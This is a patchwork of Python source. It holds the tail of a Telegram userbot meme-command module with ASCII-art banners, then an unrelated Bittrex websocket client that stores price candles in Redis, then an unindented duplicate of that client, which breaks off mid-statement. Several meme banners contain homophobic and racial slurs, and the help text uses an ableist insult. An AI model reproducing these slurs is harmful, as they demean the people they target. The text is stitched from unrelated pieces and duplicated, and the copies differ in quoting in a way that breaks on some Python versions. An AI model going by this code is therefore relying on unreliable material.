        'typing', 'contact', 'game', 'location', 'voice', 'round', 'video',
        'photo', 'document', 'cancel'
    ]
    input_str = event.pattern_match.group(1)
    args = input_str.split()
    if len(args) == 0:  # Let bot decide action and time
        scam_action = choice(options)
        scam_time = randint(30, 60)
    elif len(args) == 1:  # User decides time OR action, bot decides the other.
        # BUG FIX: the original put str(args[0]).lower() in the try block,
        # which can never raise ValueError, so a lone numeric argument was
        # treated as an action name. Try to parse a duration first instead.
        try:
            scam_time = int(args[0])
            scam_action = choice(options)
        except ValueError:
            scam_action = str(args[0]).lower()
            scam_time = randint(30, 60)
    elif len(args) == 2:  # User decides both action and time
        scam_action = str(args[0]).lower()
        scam_time = int(args[1])
    else:
        await event.edit("`Invalid Syntax !!`")
        return
    try:
        if scam_time > 0:
            await event.delete()
            # Keep the fake chat action alive for the requested duration.
            async with event.client.action(event.chat_id, scam_action):
                await sleep(scam_time)
    except BaseException:
        return
@register(pattern=r".type(?: |$)(.*)", outgoing=True)
async def typewriter(typew):
    """ Just a small command to make your keyboard become a typewriter! """
    textx = await typew.get_reply_message()
    message = typew.pattern_match.group(1)
    if not message:
        if textx:
            message = textx.text
        else:
            await typew.edit("`Give a text to type!`")
            return
    sleep_time = 0.03
    cursor = "|"
    typed = ""
    await typew.edit(cursor)
    await sleep(sleep_time)
    for character in message:
        # Reveal one more character with the cursor at the end...
        typed += character
        await typew.edit(typed + cursor)
        await sleep(sleep_time)
        # ...then redraw without the cursor for a blink effect.
        await typew.edit(typed)
        await sleep(sleep_time)
@register(outgoing=True, pattern="^.leave$")
async def leave(e):
    """ Replace ".leave" with a joke quip about leaving the group. """
    # Guard: only fire when the message starts with the bot's own "." prefix
    # (not a letter or another bot's command prefix).
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("`You must Leaving dis Group kek!`")
@register(outgoing=True, pattern="^.fail$")
async def fail(e):
    """ Replace ".fail" with a block-art thumbs-down banner. """
    # Guard: only fire on the bot's own "." prefix, not other command prefixes.
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("`\n▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ `"
                     "`\n████▌▄▌▄▐▐▌█████ `"
                     "`\n████▌▄▌▄▐▐▌▀████ `"
                     "`\n▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ `")
@register(outgoing=True, pattern="^.lol$")
async def lol_art(e):
    """ Replace ".lol" with a box-drawing "LOL" banner.

    Renamed from `lol`: that name was already used by the "-_-" animation
    handler earlier in this module, which this definition shadowed at
    module level. Decorator registration is unaffected by the rename.
    """
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("`\n╱┏┓╱╱╱╭━━━╮┏┓╱╱╱╱ `"
                     "`\n╱┃┃╱╱╱┃╭━╮┃┃┃╱╱╱╱ `"
                     "`\n╱┃┗━━┓┃╰━╯┃┃┗━━┓╱ `"
                     "`\n╱┗━━━┛╰━━━╯┗━━━┛╱ `")
@register(outgoing=True, pattern="^.lool$")
async def lool(e):
    """ Replace ".lool" with a box-drawing laughing-face banner. """
    # Guard: only fire on the bot's own "." prefix, not other command prefixes.
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("`\n╭╭━━━╮╮┈┈┈┈┈┈┈┈┈┈\n┈┃╭━━╯┈┈┈┈▕╲▂▂╱▏┈\n┈┃┃╱▔▔▔▔▔▔▔▏╱▋▋╮┈`"
                     "`\n┈┃╰▏┃╱╭╮┃╱╱▏╱╱▆┃┈\n┈╰━▏┗━╰╯┗━╱╱╱╰┻┫┈\n┈┈┈▏┏┳━━━━▏┏┳━━╯┈`"
                     "`\n┈┈┈▏┃┃┈┈┈┈▏┃┃┈┈┈┈ `")
@register(outgoing=True, pattern="^.stfu$")
async def stfu(e):
    """ Replace ".stfu" with a block-art "STFU" banner. """
    # Guard: only fire on the bot's own "." prefix, not other command prefixes.
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("`\n██████████████████████████████`"
                     "`\n██▀▀▀▀████▀▀▀▀████▀▀▀▀▀███▀▀██▀▀█`"
                     "`\n█──────██──────██───────██──██──█`"
                     "`\n█──██▄▄████──████──███▄▄██──██──█`"
                     "`\n█▄────▀████──████────█████──██──█`"
                     "`\n█▀▀██──████──████──███████──██──█`"
                     "`\n█──────████──████──███████──────█`"
                     "`\n██▄▄▄▄█████▄▄████▄▄████████▄▄▄▄██`"
                     "`\n█████████████████████████████████`")
@register(outgoing=True, pattern="^.gtfo$")
async def gtfo(e):
    """ Replace ".gtfo" with a block-art "GTFO" banner. """
    # Guard: only fire on the bot's own "." prefix, not other command prefixes.
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("`\n███████████████████████████████ `"
                     "`\n█▀▀▀▀▀▀▀█▀▀▀▀▀▀█▀▀▀▀▀▀▀█▀▀▀▀▀▀█ `"
                     "`\n█───────█──────█───────█──────█ `"
                     "`\n█──███──███──███──███▄▄█──██──█ `"
                     "`\n█──███▄▄███──███─────███──██──█ `"
                     "`\n█──██───███──███──██████──██──█ `"
                     "`\n█──▀▀▀──███──███──██████──────█ `"
                     "`\n█▄▄▄▄▄▄▄███▄▄███▄▄██████▄▄▄▄▄▄█ `"
                     "`\n███████████████████████████████ `")
@register(outgoing=True, pattern="^.nih$")
async def nih(e):
    """ Replace ".nih" with the bunny-with-a-rose kaomoji joke. """
    # Guard: only fire on the bot's own "." prefix, not other command prefixes.
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("`\n(\_/)`"
                     "`\n(•_•)`"
                     "`\n >🌹 *ini buat kamu`"
                     "`\n `"
                     "`\n(\_/)`"
                     "`\n(•_•)`"
                     "`\n🌹<\ *tapi boong`")
@register(outgoing=True, pattern="^.fag$")
async def fag(e):
    """ Replace ".fag" with its block-art banner.

    Renamed from `gtfo`: two handlers shared that name, so this definition
    shadowed the ".gtfo" handler at module level. Registration via the
    decorator is unaffected by the rename.
    """
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("`\n█████████`"
                     "`\n█▄█████▄█`"
                     "`\n█▼▼▼▼▼`"
                     "`\n█ STFU FAGGOT'S`"
                     "`\n█▲▲▲▲▲`"
                     "`\n█████████`"
                     "`\n ██ ██`")
@register(outgoing=True, pattern="^.taco$")
async def taco(e):
    """ Replace ".taco" with the taco-offering bunny kaomoji. """
    # Guard: only fire on the bot's own "." prefix, not other command prefixes.
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("\n{\__/}"
                     "\n(●_●)"
                     "\n( >🌮 Want a taco?")
@register(outgoing=True, pattern="^.paw$")
async def paw(e):
    """ Replace ".paw" with a cat-face kaomoji. """
    # Guard: only fire on the bot's own "." prefix, not other command prefixes.
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("`(=ↀωↀ=)")
@register(outgoing=True, pattern="^.tf$")
async def tf(e):
    """ Replace ".tf" with a sunglasses "deal with it" kaomoji. """
    # Guard: only fire on the bot's own "." prefix, not other command prefixes.
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("(̿▀̿ ̿Ĺ̯̿̿▀̿ ̿)̄ ")
@register(outgoing=True, pattern="^.gey$")
async def gey(e):
    """ Replace ".gey" with its box-drawing art banner. """
    # Guard: only fire on the bot's own "." prefix, not other command prefixes.
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("`\n┈┈┈╭━━━━━╮┈┈┈┈┈\n┈┈┈┃┊┊┊┊┊┃┈┈┈┈┈`"
                     "`\n┈┈┈┃┊┊╭━╮┻╮┈┈┈┈\n┈┈┈╱╲┊┃▋┃▋┃┈┈┈┈\n┈┈╭┻┊┊╰━┻━╮┈┈┈┈`"
                     "`\n┈┈╰┳┊╭━━━┳╯┈┈┈┈\n┈┈┈┃┊┃╰━━┫┈NIGGA U GEY`"
                     "\n┈┈┈┈┈┈┏━┓┈┈┈┈┈┈")
@register(outgoing=True, pattern="^.gay$")
async def gay(e):
    """ Replace ".gay" with its box-drawing art banner.

    Renamed from `gey`: two handlers shared that name, so this definition
    shadowed the ".gey" handler at module level. Registration via the
    decorator is unaffected by the rename.
    """
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("`\n┈┈┈╭━━━━━╮┈┈┈┈┈\n┈┈┈┃┊┊┊┊┊┃┈┈┈┈┈`"
                     "`\n┈┈┈┃┊┊╭━╮┻╮┈┈┈┈\n┈┈┈╱╲┊┃▋┃▋┃┈┈┈┈\n┈┈╭┻┊┊╰━┻━╮┈┈┈┈`"
                     "`\n┈┈╰┳┊╭━━━┳╯┈┈┈┈\n┈┈┈┃┊┃╰━━┫┈BAPAQ U GAY`"
                     "\n┈┈┈┈┈┈┏━┓┈┈┈┈┈┈")
@register(outgoing=True, pattern="^.bot$")
async def bot(e):
    """ Replace ".bot" with a box-drawing robot-face banner. """
    # Guard: only fire on the bot's own "." prefix, not other command prefixes.
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("` \n ╲╲╭━━━━╮ \n╭╮┃▆┈┈▆┃╭╮ \n┃╰┫▽▽▽┣╯┃ \n╰━┫△△△┣━╯`"
                     "`\n╲╲┃┈┈┈┈┃ \n╲╲┃┈┏┓┈┃ `")
@register(outgoing=True, pattern="^.hey$")
async def hey(e):
    """ Replace ".hey" with a box-drawing waving-figure banner. """
    # Guard: only fire on the bot's own "." prefix, not other command prefixes.
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("\n┈┈┈╱▔▔▔▔╲┈╭━━━━━\n┈┈▕▂▂▂▂▂▂▏┃HEY!┊😀`"
                     "`\n┈┈▕▔▇▔▔┳▔▏╰┳╮HEY!┊\n┈┈▕╭━╰╯━╮▏━╯╰━━━\n╱▔▔▏▅▅▅▅▕▔▔╲┈┈┈┈`"
                     "`\n▏┈┈╲▂▂▂▂╱┈┈┈▏┈┈┈`")
@register(outgoing=True, pattern="^.nou$")
async def nou(e):
    """ Replace ".nou" with a box-drawing "No U" banner. """
    # Guard: only fire on the bot's own "." prefix, not other command prefixes.
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("`\n┈╭╮╭╮\n┈┃┃┃┃\n╭┻┗┻┗╮`"
                     "`\n┃┈▋┈▋┃\n┃┈╭▋━╮━╮\n┃┈┈╭╰╯╰╯╮`"
                     "`\n┫┈┈ NoU\n┃┈╰╰━━━━╯`"
                     "`\n┗━━┻━┛`")
CMD_HELP.update({
"memes":
".cowsay\
\nUsage: cow which says things.\
\n\n:/\
\nUsage: Check yourself ;)\
\n\n-_-\
\nUsage: Ok...\
\n\n;_;\
\nUsage: Like `-_-` but crying.\
\n\n.cp\
\nUsage: Copypasta the famous meme\
\n\n.vapor\
\nUsage: Vaporize everything!\
\n\n.str\
\nUsage: Stretch it.\
\n\n.10iq\
\nUsage: You retard !!\
\n\n.zal\
\nUsage: Invoke the feeling of chaos.\
\n\nOof\
\nUsage: Ooooof\
\n\n.fp\
\nUsage: Facepalm :P\
\n\n.moon\
\nUsage: kensar moon animation.\
\n\n.clock\
\nUsage: kensar clock animation.\
\n\n.hi\
\nUsage: Greet everyone!\
\n\n.coinflip <heads/tails>\
\nUsage: Flip a coin !!\
\n\n.owo\
\nUsage: UwU\
\n\n.react\
\nUsage: Make your userbot react to everything.\
\n\n.slap\
\nUsage: reply to slap them with random objects !!\
\n\n.cry\
\nUsage: y u du dis, i cri.\
\n\n.shg\
\nUsage: Shrug at it !!\
\n\n.run\
\nUsage: Let Me Run, run, RUNNN!\
\n\n.chase\
\nUsage: You better start running\
\n\n.metoo\
\nUsage: Haha yes\
\n\n.mock\
\nUsage: Do it and find the real fun.\
\n\n.clap\
\nUsage: Praise people!\
\n\n.f <emoji/character>\
\nUsage: Pay Respects.\
\n\n.bt\
\nUsage: Believe me, you will find this useful.\
\n\n.type\
\nUsage: Just a small command to make your keyboard become a typewriter!\
\n\n.lfy <query>\
\nUsage: Let me Google that for you real quick !!\
\n\n.decide [Alternates: (.yes, .no, .maybe)]\
\nUsage: Make a quick decision.\
\n\n.scam <action> <time>\
\n[Available Actions: (typing, contact, game, location, voice, round, video, photo, document, cancel)]\
\nUsage: Create fake chat actions, for fun. (Default action: typing)\
\n\n\nThanks to 🅱️ottom🅱️ext🅱️ot (@NotAMemeBot) for some of these."
})
|
# Adapted from Bittrex Python WS client example
#
# Last tested 2020/09/24 on Python 3.8.5
# Note: This file is intended solely for testing purposes and may only be used
# as an example to debug and compare with your code. The 3rd party libraries
# used in this example may not be suitable for your production use cases.
# You should always independently verify the security and suitability of any
# 3rd party library used in your code.
# https://github.com/slazarov/python-signalr-client
import hashlib
import hmac
import json
import logging
import asyncio
import random
import uuid
import redis
from typing import Any, Iterable, NoReturn, Union
from signalr_aio import Connection
from base64 import b64decode
from zlib import decompress, MAX_WBITS
from common.config.constants import (
REDIS_HOST, REDIS_USER,
REDIS_PASSWORD, REDIS_DELIMITER,
DEFAULT_DATETIME_STR_RESULT
)
from common.helpers.datetimehelpers import str_to_milliseconds, redis_time
from fetchers.config.constants import (
WS_SUB_REDIS_KEY, WS_SERVE_REDIS_KEY, WS_SUB_LIST_REDIS_KEY
)
from fetchers.config.queries import MUTUAL_BASE_QUOTE_QUERY
from fetchers.rest.bittrex import BittrexOHLCVFetcher, EXCHANGE_NAME
from fetchers.utils.exceptions import (
ConnectionClosed, UnsuccessfulConnection, InvalidStatusCode
)
# Bittrex SignalR endpoint and (optional) API credentials.
URI = 'https://socket-v3.bittrex.com/signalr'
API_KEY = ''
API_SECRET = ''
# Maximum number of channel subscriptions per connection.
# FIX: this constant was assigned twice (200, then 25); only the last
# assignment ever took effect, so the dead first value is removed.
MAX_SUB_PER_CONN = 25
# Reconnect backoff bounds, in seconds.
BACKOFF_MIN_SECS = 2.0
BACKOFF_MAX_SECS = 60.0
class BittrexOHLCVWebsocket:
    """Websocket client that subscribes to Bittrex 1-minute candle channels
    over SignalR and mirrors each received OHLCV update into Redis.

    Uses a BittrexOHLCVFetcher (REST) for symbol metadata and keeps a
    `latest_ts` heartbeat timestamp so `subscribe` can detect stalls and
    reconnect.
    """
    def __init__(self):
        # Redis connection used both for storing candles and as a time source.
        self.redis_client = redis.Redis(
            host=REDIS_HOST,
            username=REDIS_USER,
            password=REDIS_PASSWORD,
            decode_responses=True
        )
        # SignalR hub & asyncio
        self.signalr_hub = None
        # Serializes server invocations: one request/response in flight at a time.
        self.asyncio_lock = asyncio.Lock()
        self.invocation_event = None
        self.invocation_response = None
        self.subscription_success = False
        # Rest fetcher for convenience
        self.rest_fetcher = BittrexOHLCVFetcher()
        # Latest timestamp with data
        self.latest_ts = None
        # Logging
        self.logger = logging.getLogger(f'{EXCHANGE_NAME}_websocket')
        self.logger.setLevel(logging.INFO)
        log_handler = logging.StreamHandler()
        log_handler.setLevel(logging.INFO)
        log_formatter = logging.Formatter(
            '%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        log_handler.setFormatter(log_formatter)
        self.logger.addHandler(log_handler)
        # Backoff
        self.backoff_delay = BACKOFF_MIN_SECS
    async def _connect(self) -> None:
        """Open the SignalR connection, register the 'c3' hub and wire callbacks."""
        self.latest_ts = redis_time(self.redis_client)
        connection = Connection(URI)
        self.signalr_hub = connection.register_hub('c3')
        connection.received += self.on_message
        connection.error += self.on_error
        connection.start()
        self.logger.info('Connected')
    async def _authenticate(self) -> None:
        """Authenticate via the hub's 'Authenticate' method (HMAC-SHA512 of
        timestamp+nonce signed with API_SECRET); on success, hook re-auth."""
        # Milliseconds since epoch; Redis server time keeps clients consistent.
        timestamp = str(int(redis_time(self.redis_client)) * 1000)
        random_content = str(uuid.uuid4())
        content = timestamp + random_content
        signed_content = hmac.new(
            API_SECRET.encode(), content.encode(), hashlib.sha512).hexdigest()
        response = await self._invoke(
            'Authenticate',
            API_KEY,
            timestamp,
            random_content,
            signed_content
        )
        if response['Success']:
            self.logger.info('Authenticated')
            self.signalr_hub.client.on('authenticationExpiring', self.on_auth_expiring)
        else:
            self.logger.warning('Authentication failed: ' + response['ErrorCode'])
    async def _subscribe(self, symbols: Iterable, i: int = 0) -> None:
        '''
        Subscribe to the heartbeat channel plus one 1-minute candle channel
        per symbol (e.g. ['ETH-BTC', 'BTC-EUR']).

        :params:
            `symbols`: iterable of Bittrex market symbols
            `i`: group index, used only for log messages
        '''
        self.subscription_success = False
        # self.signalr_hub.client.on('trade', on_trade)
        self.signalr_hub.client.on('heartbeat', self.on_heartbeat)
        self.signalr_hub.client.on('candle', self.on_candle)
        channels = (
            'heartbeat',
            # 'candle_BTC-USD_MINUTE_1'
            *(f'candle_{symbol}_MINUTE_1' for symbol in symbols)
        )
        response = await self._invoke('Subscribe', channels)
        for c in range(len(channels)):
            if response[c]['Success']:
                # Only one success is enough to switch to True
                self.subscription_success = True
            else:
                self.logger.error(
                    f"Group {i}: Subscription to {channels[c]} failed: {response[c]["ErrorCode"]}")
                # raise UnsuccessfulConnection // not a good idea to raise here
        if self.subscription_success:
            self.logger.info(f"Group {i}: Subscription successful")
    async def _invoke(self, method: str, *args) -> Union[Any, None]:
        """Invoke a hub server method and wait for its reply (set by on_message)."""
        async with self.asyncio_lock:
            self.invocation_event = asyncio.Event()
            self.signalr_hub.server.invoke(method, *args)
            await self.invocation_event.wait()
            return self.invocation_response
    async def on_message(self, **msg) -> None:
        """SignalR 'received' callback: capture invocation replies ('R' key)
        and release the waiter in `_invoke`."""
        if 'R' in msg:
            self.invocation_response = msg['R']
            self.invocation_event.set()
    async def on_error(self, msg) -> None:
        """Log connection errors; still counts as liveness for the stall check."""
        self.latest_ts = redis_time(self.redis_client)
        self.logger.warning(msg)
    async def on_heartbeat(self, msg) -> None:
        """Refresh `latest_ts` so `subscribe` knows the connection is alive."""
        self.latest_ts = redis_time(self.redis_client)
        # self.logger.info('\u2661')
    async def on_auth_expiring(self, msg) -> None:
        """Re-authenticate in the background when the server warns of expiry."""
        self.logger.info('Authentication expiring...')
        asyncio.create_task(self._authenticate())
    async def on_trade(self, msg) -> None:
        # Currently unused: the 'trade' channel hookup above is commented out.
        self.latest_ts = redis_time(self.redis_client)
        await self.decode_message('Trade', msg)
    async def on_candle(self, msg) -> None:
        """Decode a candle push and write it into Redis (sub hash + serve hash)."""
        self.latest_ts = redis_time(self.redis_client)
        respj = await self.decode_message('Candle', msg)
        # If resp is dict, process and push to Redis
        # Convert timestamp to milliseconds first
        # for conformity with the WS updater and other exchanges
        if isinstance(respj, dict):
            try:
                symbol = respj['marketSymbol']
                ohlcv = respj['delta']
                timestamp = str_to_milliseconds(
                    ohlcv['startsAt'], DEFAULT_DATETIME_STR_RESULT)
                open_ = ohlcv['open']
                high_ = ohlcv['high']
                low_ = ohlcv['low']
                close_ = ohlcv['close']
                volume_ = ohlcv['volume']
                # Delimited OHLCV row stored under the candle's timestamp.
                sub_val = f'{timestamp}{REDIS_DELIMITER}{open_}{REDIS_DELIMITER}{high_}{REDIS_DELIMITER}{low_}{REDIS_DELIMITER}{close_}{REDIS_DELIMITER}{volume_}'
                # Setting Redis data for updating ohlcv psql db
                # and serving real-time chart
                # This Redis-update-ohlcv-psql-db-procedure
                # may be changed with a pipeline from fastAPI...
                base_id = self.rest_fetcher.symbol_data[symbol]['base_id']
                quote_id = self.rest_fetcher.symbol_data[symbol]['quote_id']
                ws_sub_redis_key = WS_SUB_REDIS_KEY.format(
                    exchange = EXCHANGE_NAME,
                    base_id = base_id,
                    quote_id = quote_id,
                    delimiter = REDIS_DELIMITER
                )
                ws_serve_redis_key = WS_SERVE_REDIS_KEY.format(
                    exchange = EXCHANGE_NAME,
                    base_id = base_id,
                    quote_id = quote_id,
                    delimiter = REDIS_DELIMITER
                )
                # self.logger.info(f'ws sub redis key: {ws_sub_redis_key}')
                # self.logger.info(f'ws serve redis key: {ws_serve_redis_key}')
                # Add ws sub key to set of all ws sub keys
                # Set hash value for ws sub key
                # Replace ws serve key hash if this timestamp
                # is more up-to-date
                self.redis_client.sadd(
                    WS_SUB_LIST_REDIS_KEY, ws_sub_redis_key
                )
                self.redis_client.hset(
                    ws_sub_redis_key, timestamp, sub_val)
                current_timestamp = self.redis_client.hget(
                    ws_serve_redis_key, 'time')
                if current_timestamp is None or \
                    timestamp >= int(current_timestamp):
                    self.redis_client.hset(
                        ws_serve_redis_key,
                        mapping = {
                            'time': timestamp,
                            'open': open_,
                            'high': high_,
                            'low': low_,
                            'close': close_,
                            'volume': volume_
                        }
                    )
            except Exception as exc:
                # NOTE(review): "Fethcer" is a typo in this log message.
                self.logger.warning(
                    f"Bittrex WS Fethcer: EXCEPTION: {exc}")
    async def decode_message(self, title, msg) -> Any:
        """Decode the first element of a SignalR payload; `title` is unused."""
        decoded_msg = await self.process_message(msg[0])
        return decoded_msg
    async def process_message(self, message) -> Any:
        """Base64-decode, zlib-inflate (raw deflate first) and JSON-parse a payload."""
        try:
            decompressed_msg = decompress(
                b64decode(message, validate=True), -MAX_WBITS)
        # NOTE(review): zlib's decompress raises zlib.error, not SyntaxError,
        # so this fallback path looks unreachable — confirm against the
        # upstream Bittrex example this was adapted from.
        except SyntaxError:
            decompressed_msg = decompress(b64decode(message, validate=True))
        return json.loads(decompressed_msg.decode())
    async def subscribe(self, symbols: Iterable) -> NoReturn:
        '''
        Run forever: (re)connect, authenticate (when API_SECRET is set) and
        subscribe to the candle channels of `symbols`, reconnecting with
        exponential backoff whenever the stream stalls (>60s without a
        heartbeat) or the connection raises.
        '''
        while True:
            try:
                now = redis_time(self.redis_client)
                # Reconnect when never connected, stalled for >60s, or the
                # previous subscription attempt failed entirely.
                if self.signalr_hub is None \
                    or (now - self.latest_ts) > 60 \
                    or (not self.subscription_success):
                    await self._connect()
                    if API_SECRET != '':
                        await self._authenticate()
                    else:
                        self.logger.info('Authentication skipped because API key was not provided')
                    await self._subscribe(symbols)
            # Not sure what kind of exception we will encounter
            except (ConnectionClosed, InvalidStatusCode) as exc:
                self.logger.warning(
                    f"Connection raised exception: {exc} - reconnecting..."
                )
                await asyncio.sleep(min(self.backoff_delay, BACKOFF_MAX_SECS))
                self.backoff_delay *= (1+random.random()) # add a random factor
            # Sleep to release event loop
            await asyncio.sleep(0.01)
    async def all(self) -> NoReturn:
        """Subscribe to every symbol known to the REST fetcher."""
        self.rest_fetcher.fetch_symbol_data()
        symbols = tuple(self.rest_fetcher.symbol_data.keys())
        await asyncio.gather(self.subscribe(symbols))
    async def mutual_basequote(self) -> NoReturn:
        '''
        Subscribes to WS channels of the mutual symbols
        among all exchanges
        '''
        symbols_dict = self.rest_fetcher.get_symbols_from_exch(MUTUAL_BASE_QUOTE_QUERY)
        await asyncio.gather(self.subscribe(symbols_dict.keys()))
    def run_mutual_basequote(self) -> None:
        """Blocking entry point for `mutual_basequote`."""
        # loop = asyncio.get_event_loop()
        # if loop.is_closed():
        #     asyncio.set_event_loop(asyncio.new_event_loop())
        # loop = asyncio.get_event_loop()
        # try:
        #     loop.create_task(self.mutual_basequote())
        #     loop.run_forever()
        # finally:
        #     loop.close()
        asyncio.run(self.mutual_basequote())
    def run_all(self) -> None:
        """Blocking entry point for `all`."""
        asyncio.run(self.all())
| # Adapted from Bittrex Python WS client example
#
# Last tested 2020/09/24 on Python 3.8.5
# Note: This file is intended solely for testing purposes and may only be used
# as an example to debug and compare with your code. The 3rd party libraries
# used in this example may not be suitable for your production use cases.
# You should always independently verify the security and suitability of any
# 3rd party library used in your code.
# https://github.com/slazarov/python-signalr-client
import hashlib
import hmac
import json
import logging
import asyncio
import random
import uuid
import redis
from typing import Any, Iterable, NoReturn, Union
from signalr_aio import Connection
from base64 import b64decode
from zlib import decompress, MAX_WBITS
from common.config.constants import (
REDIS_HOST, REDIS_USER,
REDIS_PASSWORD, REDIS_DELIMITER,
DEFAULT_DATETIME_STR_RESULT
)
from common.helpers.datetimehelpers import str_to_milliseconds, redis_time
from fetchers.config.constants import (
WS_SUB_REDIS_KEY, WS_SERVE_REDIS_KEY, WS_SUB_LIST_REDIS_KEY
)
from fetchers.config.queries import MUTUAL_BASE_QUOTE_QUERY
from fetchers.rest.bittrex import BittrexOHLCVFetcher, EXCHANGE_NAME
from fetchers.utils.exceptions import (
ConnectionClosed, UnsuccessfulConnection, InvalidStatusCode
)
# Bittrex SignalR endpoint and (optional) API credentials.
URI = 'https://socket-v3.bittrex.com/signalr'
API_KEY = ''
API_SECRET = ''
# Maximum number of channel subscriptions per connection.
# FIX: this constant was assigned twice (200, then 25); only the last
# assignment ever took effect, so the dead first value is removed.
MAX_SUB_PER_CONN = 25
# Reconnect backoff bounds, in seconds.
BACKOFF_MIN_SECS = 2.0
BACKOFF_MAX_SECS = 60.0
class BittrexOHLCVWebsocket:
def __init__(self):
self.redis_client = redis.Redis(
host=REDIS_HOST,
username=REDIS_USER,
password=REDIS_PASSWORD,
decode_responses=True
)
# SignalR hub & asyncio
self.signalr_hub = None
self.asyncio_lock = asyncio.Lock()
self.invocation_event = None
self.invocation_response = None
self.subscription_success = False
# Rest fetcher for convenience
self.rest_fetcher = BittrexOHLCVFetcher()
# Latest timestamp with data
self.latest_ts = None
# Logging
self.logger = logging.getLogger(f'{EXCHANGE_NAME}_websocket')
self.logger.setLevel(logging.INFO)
log_handler = logging.StreamHandler()
log_handler.setLevel(logging.INFO)
log_formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
log_handler.setFormatter(log_formatter)
self.logger.addHandler(log_handler)
# Backoff
self.backoff_delay = BACKOFF_MIN_SECS
async def _connect(self) -> None:
self.latest_ts = redis_time(self.redis_client)
connection = Connection(URI)
self.signalr_hub = connection.register_hub('c3')
connection.received += self.on_message
connection.error += self.on_error
connection.start()
self.logger.info('Connected')
async def _authenticate(self) -> None:
timestamp = str(int(redis_time(self.redis_client)) * 1000)
random_content = str(uuid.uuid4())
content = timestamp + random_content
signed_content = hmac.new(
API_SECRET.encode(), content.encode(), hashlib.sha512).hexdigest()
response = await self._invoke(
'Authenticate',
API_KEY,
timestamp,
random_content,
signed_content
)
if response['Success']:
self.logger.info('Authenticated')
self.signalr_hub.client.on('authenticationExpiring', self.on_auth_expiring)
else:
self.logger.warning('Authentication failed: ' + response['ErrorCode'])
async def _subscribe(self, symbols: Iterable, i: int = 0) -> None:
'''
Subscribes to Bittrex WS for `symbols`
:params:
`symbols` list of symbols
e.g., ['ETH-BTC', 'BTC-EUR']
'''
self.subscription_success = False
# self.signalr_hub.client.on('trade', on_trade)
self.signalr_hub.client.on('heartbeat', self.on_heartbeat)
self.signalr_hub.client.on('candle', self.on_candle)
channels = (
'heartbeat',
# 'candle_BTC-USD_MINUTE_1'
*(f'candle_{symbol}_MINUTE_1' for symbol in symbols)
)
response = await self._invoke('Subscribe', channels)
for c in range(len(channels)):
if response[c]['Success']:
# Only one success is enough to switch to True
self.subscription_success = True
else:
self.logger.error(
f"Group {i}: Subscription to {channels[c]} failed: {response[c]['ErrorCode']}")
# raise UnsuccessfulConnection // not a good idea to raise here
if self.subscription_success:
self.logger.info(f"Group {i}: Subscription successful")
async def _invoke(self, method: str, *args) -> Union[Any, None]:
async with self.asyncio_lock:
self.invocation_event = asyncio.Event()
self.signalr_hub.server.invoke(method, *args)
await self.invocation_event.wait()
return self.invocation_response
async def on_message(self, **msg) -> None:
if 'R' in msg:
self.invocation_response = msg['R']
self.invocation_event.set()
async def on_error(self, msg) -> None:
self.latest_ts = redis_time(self.redis_client)
self.logger.warning(msg)
async def on_heartbeat(self, msg) -> None:
self.latest_ts = redis_time(self.redis_client)
# self.logger.info('\u2661')
async def on_auth_expiring(self, msg) -> None:
self.logger.info('Authentication expiring...')
asyncio.create_task(self._authenticate())
async def on_trade(self, msg) -> None:
self.latest_ts = redis_time(self.redis_client)
await self.decode_message('Trade', msg)
async def on_candle(self, msg) -> None:
self.latest_ts = redis_time(self.redis_client)
respj = await self.decode_message('Candle', msg)
# If resp is dict, process and push to Redis
# Convert timestamp to milliseconds first
# for conformity with the WS updater and other exchanges
if isinstance(respj, dict):
try:
symbol = respj['marketSymbol']
ohlcv = respj['delta']
timestamp = str_to_milliseconds(
ohlcv['startsAt'], DEFAULT_DATETIME_STR_RESULT)
open_ = ohlcv['open']
high_ = ohlcv['high']
low_ = ohlcv['low']
close_ = ohlcv['close']
volume_ = ohlcv['volume']
sub_val = f'{timestamp}{REDIS_DELIMITER}{open_}{REDIS_DELIMITER}{high_}{REDIS_DELIMITER}{low_}{REDIS_DELIMITER}{close_}{REDIS_DELIMITER}{volume_}'
# Setting Redis data for updating ohlcv psql db
# and serving real-time chart
# This Redis-update-ohlcv-psql-db-procedure
# may be changed with a pipeline from fastAPI...
base_id = self.rest_fetcher.symbol_data[symbol]['base_id']
quote_id = self.rest_fetcher.symbol_data[symbol]['quote_id']
ws_sub_redis_key = WS_SUB_REDIS_KEY.format(
exchange = EXCHANGE_NAME,
base_id = base_id,
quote_id = quote_id,
delimiter = REDIS_DELIMITER
)
ws_serve_redis_key = WS_SERVE_REDIS_KEY.format(
exchange = EXCHANGE_NAME,
base_id = base_id,
quote_id = quote_id,
delimiter = REDIS_DELIMITER
)
# self.logger.info(f'ws sub redis key: {ws_sub_redis_key}')
# self.logger.info(f'ws serve redis key: {ws_serve_redis_key}')
# Add ws sub key to set of all ws sub keys
# Set hash value for ws sub key
# Replace ws serve key hash if this timestamp
# is more up-to-date
self.redis_client.sadd(
